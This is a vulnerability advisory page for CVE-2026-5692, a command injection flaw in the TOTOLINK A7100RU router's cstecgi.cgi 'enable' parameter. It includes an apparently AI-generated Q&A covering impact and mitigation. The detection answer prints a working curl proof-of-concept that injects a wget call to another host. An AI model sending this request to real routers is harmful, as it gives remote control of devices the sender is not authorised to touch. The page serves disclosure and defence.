CVE-2026-5692
OS Command Injection in Totolink A7100RU setGameSpeedCfg CGI
Publication date: 2026-04-07
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5692 is a remote command injection vulnerability found in the TOTOLINK A7100RU router, specifically in version 7.4cu.2313_b20191024.
The flaw exists in the cstecgi.cgi CGI script, within the function that processes a user-supplied parameter named "enable." This parameter is inserted into a buffer using snprintf and then executed by the system via execv().
Because of unsafe handling of this input, an attacker can craft a malicious request that sets the "enable" parameter to arbitrary operating system commands, which the router will then execute.
This means an attacker can remotely execute arbitrary commands on the router by sending specially crafted requests to the /cgi-bin/cstecgi.cgi endpoint.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected router without any authentication.
- Attackers can take control of the router, potentially altering its configuration or behavior.
- They could use the router as a foothold to launch further attacks within the network.
- Sensitive data passing through the router could be intercepted or manipulated.
- The router could be used to download malicious payloads or participate in botnets.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending a crafted POST request to the /cgi-bin/cstecgi.cgi endpoint of the TOTOLINK A7100RU router, specifically targeting the "enable" parameter to check for command injection.
A proof of concept involves sending a POST request with the "enable" parameter set to a command such as `wget 192.168.6.1:7777/testpoc`. If the router executes the command, it confirms the presence of the vulnerability.
- Use curl or similar tool to send the test POST request: curl -X POST http://<router-ip>/cgi-bin/cstecgi.cgi -d "enable=wget 192.168.6.1:7777/testpoc"
- Monitor the router or network for evidence of the command execution, such as network traffic to the specified IP and port.
What immediate steps should I take to mitigate this vulnerability?
To mitigate the CVE-2026-5692 vulnerability, immediate steps include restricting remote access to the affected router's /cgi-bin/cstecgi.cgi endpoint to prevent exploitation of the command injection flaw.
Additionally, monitoring network traffic for suspicious POST requests containing the 'enable' parameter with unusual values can help detect exploitation attempts.
If possible, apply any available firmware updates or patches from the vendor that address this vulnerability.
As a temporary measure, consider disabling or limiting the functionality of the vulnerable CGI script if the router configuration allows.